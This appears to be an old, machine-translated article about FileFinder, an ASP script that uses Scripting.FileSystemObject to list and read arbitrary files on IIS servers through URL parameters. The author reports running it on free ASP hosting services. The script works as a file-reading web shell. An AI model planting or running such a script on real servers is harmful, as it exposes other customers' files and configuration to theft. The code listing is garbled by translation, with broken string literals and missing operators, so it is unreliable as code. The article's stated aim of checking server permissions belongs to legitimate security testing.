Edward Yang (EDYANG75@sina.com)
Scripting.FileSystemObject object is one of the COM objects that are provided by Scrrun.dll for VBScript / JScript control. Scripting.FileSystemObject provides a very convenient text file and file directory access, but it also has a certain threat to IIS web server data security.
Before you continue to discuss, please go to the author's home page http://263.9cbs.net/edyang/ Download District Source column Download FileFinder ASP source code.
The FileFinder code is simple, consisting of three functions and 30 rows of order code.
The most critical is the FindFiles function, which implements traversal to a directory by calling it, and searches for these files in accordance with a specific file extension.
Function Findfiles (strStartFolder, strexT)
DIM N
Dim Othisfolder
Dim ofolders
DIM ofiles
DIM ofolder
DIM OXILE
'If the system administrator is detailed, the following code is wrong.
'But some directories can still be viewed, so we simply ignore the mistakes
ON Error ResMe next
N = 0
Response.write " Searching" & StrstartFolder & "
Set otherisfolder = g_fs.getfolder (strStartFolder)
Set ofiles = othisfolder.files
For Each ofile IN Ofiles
'If it is the specified file extension, the output connection is guided itself, but with different commands cmd
'Here is cmd = read, i.e. read the text file that specifies the physical path.
If Issuffix (ofile.path, strext) THEN
Response.write " "& Ofile.Path &" < / font>
IF err = 0 THEN
n = n 1
END IF
END IF
NEXT
Set ofolders = OtHisfolder.subfolders
For Each ofolder InfoLDERS
n = n findfiles (ofolder.path, strext)
NEXT
Findfiles = n
END FUNCTION
The following code is to analyze the parameters behind the URL:
'Readout the value of each parameter
Strcmd = ucase (Request.QueryString ("cmd"))
StrPath = Request.QueryString ("Path")
strext = request.QueryString ("EXT")
BrawData = ucase (Request.QueryString ("RAW")) 'Default Search .asp file
If strpath = "" "
StrPath = "."
END IF
If strext = "" ""
strext = ".asp"
END IF
'Perform different code based on different commands cmd
Select Case StrCmd
Case "find"
Response.write FindFiles (StrPath, Strext) & "File (s) FOUND"
Case "Read"
If BrawData = "T" THEN
Response.write readtextFile (STRPATH)
Else
Response.write "
" & Server.htmlencode (ReadTextFile (StrPath)) & ""END IF
Case Else
Response.write "
please specify a command to execute "
End SELECT
As can be seen from the above analysis, if there is enough permissions, we can find any text files on the IIS web server via FileFinder, and can easily view the file content. For non-text files, they can determine if they exist and their paths, which are sometimes extremely important for advanced HACKERs.
But these prerequisites for these threats of data is to perform FF.ASP users have at least the permissions of the read directory and files. Since the default security settings after Windows NT Server are installed, all users can "read" directory and files, so whether it is the default user IUSR_SERVERNAME IUSR_SERVERNAME or any other user, it can read the directory and files. Information. Most of the Windows NT Server system administrators mainly care about whether the system can run, generally unwilling to change the default directory and file permissions, after all, do a big risk, and need many experience. So, we can use FileFinder to check if the security settings of the NT Server of the Web Server are safe.
The author is specifically set up for the permissions of the file system of the IIS web server, but is limited to no experience, resulting in many strange mistakes, such as: NT Server 4.0 used to do experiments cannot be connected to the Access database. These functions are normal before performing file system permission changes.
In the purpose of pure research, the author is also experimenting with the free ASP space I applied (including my personal homepage provided by 9CBS), and the result is that FileFinder can run smoothly. And at http://www2.domaindlx.com/index.html, there is no such problem, and this free ASP homepage provider can be seen in this regard or serious. Although the Domaindlx's web server runs on Windows 2000 Server, its default file system security permissions and NT 4.0 have no big difference.
Due to the limited capacity of the author, discuss this issue here. References are only available to the domestic ASP homepage providers in this article, hoping to help the data security between providers and customers.
